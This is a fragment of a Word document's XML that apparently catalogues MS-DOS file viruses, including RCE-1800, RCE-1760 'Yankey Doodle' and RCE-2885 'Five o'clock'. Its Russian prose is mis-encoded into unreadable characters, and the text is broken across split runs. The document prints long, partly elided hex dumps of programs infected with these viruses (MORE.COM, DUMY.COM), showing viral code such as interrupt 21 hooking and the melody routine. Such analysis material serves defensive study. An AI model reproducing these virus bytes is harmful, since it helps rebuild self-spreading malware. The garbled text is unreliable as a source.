          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﭨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ࠧ���� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��� ������ ��⠭����� ����� READ ONLY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⮬ ���������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>맮� 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樠��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠  �����  �� ������� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਭ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樯���쭮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⥪��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠣 ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१����⭮� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������ � �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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��⨢��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樭� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨢ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 xml:space="preserve">⢥ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠣�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>४��������� �ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⢠,  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪠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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MORE.COM, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE-18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0   E9 D5 04 21 3D 03 1E 74 09 BA FC 01 B4 09 CD 21   ...!=..t....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   CD 20 C6 06 E5 01 19 B4 0F CD 10 88 26 E6 01 BA   . ..........&amp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0   17 02 B4 09 CD 21 33 DB B4 45 CD 21 8B E8 B4 3E   .....!3..E.!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0   CD 21 BB 02 00 B4 45 CD 21 FC BA 1A 02 B9 00 10   .!....E.!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0   8B DD B4 3F CD 21 0B C0 75 02 CD 20 8B C8 8B F2   ...?.!..u..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0   AC 3C 1A 74 F5 3C 0D 75 07 C6 06 E8 01 01 EB 4C   .&lt;.t.&lt;.u.......L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0   3C 0A 75 06 FE 06 E7 01 EB 42 3C 08 75 0D 80 3E   &lt;.u......B&lt;.u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0   E8 01 01 74 37 FE 0E E8 01 EB 31 3C 09 75 12 8A   ...t7.....1&lt;.u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0   26 E8 01 80 C4 07 80 E4 F8 FE C4 88 26 E8 01 EB   &amp;...........&amp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0   1B 3C 07 74 17 FE 06 E8 01 8A 26 E8 01 3A 26 E6   .&lt;.t......&amp;..:&amp;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0   01 76 09 FE 06 E7 01 C6 06 E8 01 01 8A D0 B4 02   .v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0   CD 21 8A 26 E7 01 3A 26 E5 01 72 20 BA F0 01 B4   .!.&amp;..:&amp;..r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C0   09 CD 21 B4 0C B0 01 CD 21 BA 17 02 B4 09 CD 21   ..!.....!...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>01D0   C6 06 E8 01 01 C6 06 E7 01 01 4E 41 49 74 03 E9   ..........NA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E0   6E FF E9 54 FF 18 50 01 01 00 00 00 00 00 00 00   n..T..P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0   0D 2D 2D 20 4D 6F 72 65 20 2D 2D 24 4D 4F 52 45   .-- More --$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   3A 20 49 6E 63 6F 72 72 65 63 74 20 44 4F 53 20   : Incorrec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0   76 65 72 73 69 6F 6E 0D 0A 24 00 00 00 00 00 00   version..$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0   4D 08 00 70 00 00 00 00 00 00 00 00 00 00 00 00   M..p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0   60 02 CA 15 60 14 26 02 56 05 70 14 24 01 A2 13   `...`.&amp;.V.p.$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0   20 00 05 00 01 00 21 10 00 00 00 01 0B B4 30 CD    .....!......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0   21 3D 03 1E 74 09 BA FC 01 B4 09 FF 2E 10 00 9C   !=..t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0   FA 2E FF 1E 14 00 C3 53 50 2E 8B 1E 22 00 B4 45   .......SP..."..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0   E8 EC FF 72 09 8B D8 B4 3E E8 E3 FF EB 01 F8 58   ...r....&gt;......X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0   5B C3 B0 03 CF 50 E4 60 3C 53 75 2E B4 02 CD 16   [....P.`&lt;Su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0   24 0C 3C 0C 75 24 8C C8 8E D8 8E D0 BC FE FF 2E   $.&lt;.u$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0   80 3E 2C 00 0A 72 03 E8 C4 05 B8 00 00 8E D8 C7   .&gt;,..r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B0   06 72 04 34 12 EA F0 FF 00 F0 58 2E FF 2E 1C 00   .r.4......X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C0   9C 3D 00 4B 74 61 3D 00 C5 74 48 3D 01 C5 74 48   .=.Kta=..tH=..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2D0   3D 02 C5 74 4B 3D 03 C5 74 0C 9D 2E FF 2E 10 00   =..tK=..t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0   9D FB F9 CA 02 00 B8 1A 00 2E F6 06 2B 00 02 75   ............+..u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>02F0   01 48 3B D8 B0 00 D0 D0 50 B8 19 00 2E F6 06 2B   .H;.....P......+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0   00 04 75 01 40 3B D8 2E C4 1E 14 00 58 44 44 FB   ..u.@;......X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0   CA 02 00 B8 19 00 EB C8 2E A0 2B 00 B4 00 EB C0   ..........+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0   2E 88 0E 2B 00 EB B9 06 1E 55 57 56 52 51 53 50   ...+.....UWVRQSP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0   8B EC 0E 1F FF 76 0E FF 76 06 E8 F1 01 9F 83 C4   .....v..v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... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ..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0   80 EF 3C FE C0 3C 3C 72 04 2C 3C FE C4 80 FC 18   ..&lt;..&lt;&lt;r.,&lt;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0   75 02 2A E4 50 B4 2C CD 21 58 3B C8 77 06 72 F4   u.*.P.,.!X;.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0   3B D3 72 F0 5A 59 5B 58 C3 50 51 52 57 B0 B6 E6   ;.r.ZY[X.PQR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0   43 BA 14 00 B8 80 32 F7 F7 E6 42 8A C4 E6 42 E4   C.....2...B..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0   61 8A E0 0C 03 E6 61 8A C1 E8 95 FF 8A C4 E6 61   a.....a........a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0   5F 5A 59 58 C3 8B 3C 83 FF FF 74 11 3E 8A 5E 00   _ZYX..&lt;...t.&gt;.^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0   2A C9 2A FF E8 C2 FF 83 C6 02 45 75 E8 C3 BE 58   *.*.......Eu...X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0870   06 BD CC 06 E8 DE FF C3 06 01 06 01 25 01 49 01   ............%.I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0   06 01 49 01 25 01 C4 00 06 01 06 01 25 01 49 01   ..I.%.......%.I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0   06 01 06 01 06 01 06 01 25 01 49 01 5D 01 49 01   ........%.I.].I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A0   25 01 06 01 F6 00 C4 00 DC 00 F6 00 06 01 06 01   %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B0   DC 00 F6 00 DC 00 AE 00 DC 00 F6 00 06 01 DC 0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C0   C4 00 DC 00 C4 00 AE 00 A4 00 AE 00 C4 00 DC 0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D0   F6 00 DC 00 AE 00 DC 00 F6 00 06 01 DC 00 C4 0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E0   06 01 F6 00 25 01 06 01 06 01 FF FF 19 19 19 19   ....%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F0   19 19 19 19 19 19 19 19 32 32 19 19 19 19 19 19   ........22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0   19 19 19 19 19 19 32 32 1A 19 1A 19 19 19 19 19   ......22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0   1A 19 1A 19 19 19 1E 1A 19 1A 19 19 19 19 1E 19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20   19 19 19 32 32 1A 01 33 CE�F4 7A 19�B4            ...22..3..z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2.2.  �����  R�E-1760 (�P18,  Yankey  Doodle -  ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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몠�쭠�  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠪ��᪨ �� �⫨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥��� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DUMY.COM, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE-17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: E9 B8 03 90 90 90 90 90  90 90 90 90 90 90 90 9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: 90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 9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: 90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 9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0: 4D 08 00 6D 00 00 00 00  00 00 00 00 00 00 00 00   M..m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: 39 03 98 14 60 14 64 02  56 05 9D 10 E6 04 9A 11   9...`.d.V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0: 20 00 05 00 45 00 21 00  00 00 00 01 2F 90 90 90    ...E.!...../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0: 90 90 90 90 90 90 90 90  90 90 90 FF 2E 10 00 9C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 FA 2E FF 1E 14 00 C3 53  50 2E 8B 1E 22 00 B4 45   .......SP..."..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0: E8 EC FF 72 09 8B D8 B4  3E E8 E3 FF EB 01 F8 58   ...r....&gt;......X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0: 5B C3 B0 03 CF 50 E4 60  3C 53 75 2E B4 02 CD 16   [....P.`&lt;Su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0: 24 0C 3C 0C 75 24 8C C8  8E D8 8E D0 BC FE FF 2E   $.&lt;.u$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B0: 80 3E 2C 00 0A 72 03 E8  97 05 B8 00 00 8E D8 C7   .&gt;,..r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0: 06 72 04 34 12 EA F0 FF  00 F0 58 2E FF 2E 1C 00   .r.4......X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0: 9C 3D 00 4B 74 61 3D 00  C5 74 48 3D 01 C5 74 48   .=.Kta=..tH=..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0: 3D 02 C5 74 4B 3D 03 C5  74 0C 9D 2E FF 2E 10 00   =..tK=..t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F0: 9D FB F9 CA 02 00 B8 19  00 2E F6 06 2B 00 02 75   ............+..u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: 01 48 3B D8 B0 00 D0 D0  50 B8 18 00 2E F6 06 2B   .H;.....P......+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: 00 04 75 01 40 3B D8 2E  C4 1E 14 00 58 44 44 FB   ..u.@;......X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0: CA 02 00 B8 18 00 EB C8  2E A0 2B 00 B4 00 EB C0   ..........+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0: 2E 88 0E 2B 00 EB B9 06  1E 55 57 56 52 51 53 50   ...+.....UWVRQ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...   ...   ...   ...    ...   ...   ...   ...     ...   ...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30: 0E 2E 81 3E 00 01 4D 5A  74 05 BB 00 01 53 C3 E8   ...&gt;..MZt....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0: 00 00 5B 50 8C C0 05 10  00 8B 0E 0E 01 03 C8 89   ..[P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50: 4F FB 8B 0E 16 01 03 C8  89 4F F7 8B 0E 10 01 89   O........O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60: 4F F9 8B 0E 14 01 89 4F  F5 8B 3E 18 01 8B 16 08   O......O..&gt;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70: 01 B1 04 D3 E2 8B 0E 06  01 E3 17 26 C5 B5 00 01   ...........&amp;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80: 83 C7 04 8C DD 26 03 2E  08 01 03 E8 8E DD 01 04   .....&amp;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90: E2 E9 0E 1F BF 00 01 8B  F2 81 C6 00 01 8B CB 2B   ...............+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>04A0: CE F3 A4 58 FA 8E 57 FB  8B 67 F9 FB FF 6F F5 BE   ...X..W..g...o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B0: 00 00 BF 00 00 8B CB 81  C1 82 FC 8C C2 4A 8E C2   .............J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0: 8C DA 4A 8E DA 03 F1 4E  8B FE FD F3 A4 FC 2E 8B   ..J....N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D0: 97 75 FC 42 26 29 16 03  00 26 8C 0E 01 00 BF 00   .u.B&amp;)...&amp;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E0: 00 8B F3 81 C6 72 FC B9  E0 06 1E 07 0E 1F F3 A4   .....r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F0: 53 8C CB B4 50 CD 21 5B  2E 8C 0E 36 00 2E 8B 16   S...P.![...6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0: 2C 00 4A 8E C2 26 8C 0E  01 00 8C D2 4A 8E DA 53   ,.J..&amp;......J..S</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0510: B8 21 35 CD 21 8C 06 12  00 89 1E 10 00 8C 06 16   .!5.!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20: 00 89 1E 14 00 B8 09 35  CD 21 8C 06 1E 00 89 1E   .......5.!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30: 1C 00 5B B8 21 25 BA A0  00 CD 21 B8 01 25 BA 35   ..[.!%....!..%.5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0: 05 CD 21 BA 65 00 9C 8B  C3 05 DC 01 0E 50 FA 9C   ..!.e........P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50: 58 0D 00 01 50 8B C3 05  AD FC 0E 50 B8 09 25 C6   X...P......P..%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60: 06 2A 00 01 CF 55 8B EC  2E 80 3E 2A 00 01 74 0D   .*...U....&gt;*.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70: 81 66 06 FF FE 2E C6 06  2A 00 00 5D CF 81 7E 04   .f......*..]..~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80: 00 03 72 02 5D CF 53 8B  5E 02 2E 89 1E 14 00 8B   ..r.].S.^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90: 5E 04 2E 89 1E 16 00 5B  EB D6 C6 06 2A 00 00 B8   ^......[.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A0: 00 00 8E C0 26 C7 06 C5  00 7F 39 26 C6 06 C7 00   ....&amp;.....9&amp;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B0: 18 8C C8 8E D8 B4 1A BA  50 00 CD 21 2E 8B 87 9A   ........P..!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C0: FC E9 39 FE 50 53 51 52  B4 2C CD 21 8A E5 02 C1   ..9.PSQR.,.!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D0: 02 FE 02 DA 80 FB 64 72  05 80 EB 64 FE C7 80 FF   ......dr...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E0: 3C 72 05 80 EF 3C FE C0  3C 3C 72 04 2C 3C FE C4   &lt;r...&lt;..&lt;&lt;r.,&lt;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F0: 80 FC 18 75 02 2A E4 50  B4 2C CD 21 58 3B C8 77   ...u.*.P.,.!X;.w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0: 06 72 F4 3B D3 72 F0 5A  59 5B 58 C3 50 51 52 57   .r.;.r.ZY[X.PQRW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0610: B0 B6 E6 43 BA 14 00 B8  80 32 F7 F7 E6 42 8A C4   ...C.....2...B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20: E6 42 E4 61 8A E0 0C 03  E6 61 8A C1 E8 95 FF 8A   .B.a.....a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30: C4 E6 61 5F 5A 59 58 C3  8B 3C 83 FF FF 74 11 3E   ..a_ZYX..&lt;...t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640: 8A 5E 00 2A C9 2A FF E8  C2 FF 83 C6 02 45 75 E8   .^.*.*.......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50: C3 BE 2B 06 BD 9F 06 E8  DE FF C3 06 01 06 01 25   ..+............%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0660: 01 49 01 06 01 49 01 25  01 C4 00 06 01 06 01 25   .I...I.%.......%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0670: 01 49 01 06 01 06 01 06  01 06 01 25 01 49 01 5D   .I.........%.I.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0680: 01 49 01 25 01 06 01 F6  00 C4 00 DC 00 F6 00 06   .I.%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90: 01 06 01 DC 00 F6 00 DC  00 AE 00 DC 00 F6 00 06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A0: 01 DC 00 C4 00 DC 00 C4  00 AE 00 A4 00 AE 00 C4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B0: 00 DC 00 F6 00 DC 00 AE  00 DC 00 F6 00 06 01 DC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C0: 00 C4 00 06 01 F6 00 25  01 06 01 06 01 FF FF 19   .......%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D0: 19 19 19 19 19 19 19 19  19 19 19 32 32 19 19 19   ...........2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E0: 19 19 19 19 19 19 19 19  19 32 32 1A 19 1A 19 19   .........22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F0: 19 19 19 1A 19 1A 19 19  19 1E 1A 19 1A 19 19 19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0: 19 1E 19 19 19 19 32 32  30 00 93 91�F4 7A 18�90   ......220....z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3. �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� ��몠���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� �室�� �������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>襭�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬�� ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ᮢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ��-��������, �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢�⥫� ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� ����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>17.00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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ���⮬� �� ������ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Five o'clock. �⠬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騥 � ������ �����㯯� 㢥��稢��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭪樮�����  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⠭��� ����� �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 ������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬���� ������ �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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頥� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᥡ� �������� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, �� �� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ঠ� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯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 xml:space="preserve">ᨬ����� � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>05.  ���⮬� ��� ���⥪�⭮�� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠ ��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 ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ������� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쬨 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>७�� 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⭠������ ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稭�� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬�� RCE-2661 (��-38) � ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਬ��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㦥��� 䨫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">墠�뢠�騬� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>21. �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਬ������ �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  �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�� �ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  "</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨤ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" �� 21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 � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਣ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稪 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">MS DOS �  ����������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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饣�  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬�  ⮣�  ������ � �⮣� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬�� �������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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  <w:r>
        <w:rPr/>
        <w:t>ᠬ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ����⪥ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�� 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ࠦ����� ����ᮬ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稭�� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬�� ��-42 ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஬ �� �����࠭���� ����ᮬ  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>B1024R  (�⠫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稪</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).  � ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����� �� ����⢨⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠪,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ࠫ���� ��� ����� � �������⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 㬥��蠥� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>७��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稪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 xml:space="preserve">祭��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>42 (�.�.  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭��� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��) �� 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⨦���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稪�� ���祭�� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭨�⮦�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬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  �  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��  TP-44 ������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠥ��� �� ����� ࠧ �� ���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ᠬ� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>17.00, � � ����⭮���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਡ����⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1/8, �� ��᪮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㤭�� �����㦥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, �������,  �⠬�� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠬ� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>46 � ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫��᪮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稪�  ��᫥���� � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>R�-1701 (�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪢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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭���� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢�⥫�� �⮩ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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CE-2885 (Five o'clock; TP-44), � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ண� �� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筥� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠭ�� �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� ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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3.1. �⠬� RCE-2885 (TP-44; Five o'c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R�E-2885 ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������  ����ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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䠩�� ⨯� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ⠪ � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந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᪥ �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">믮������ </w:t>
      </w:r>
      <w:r>
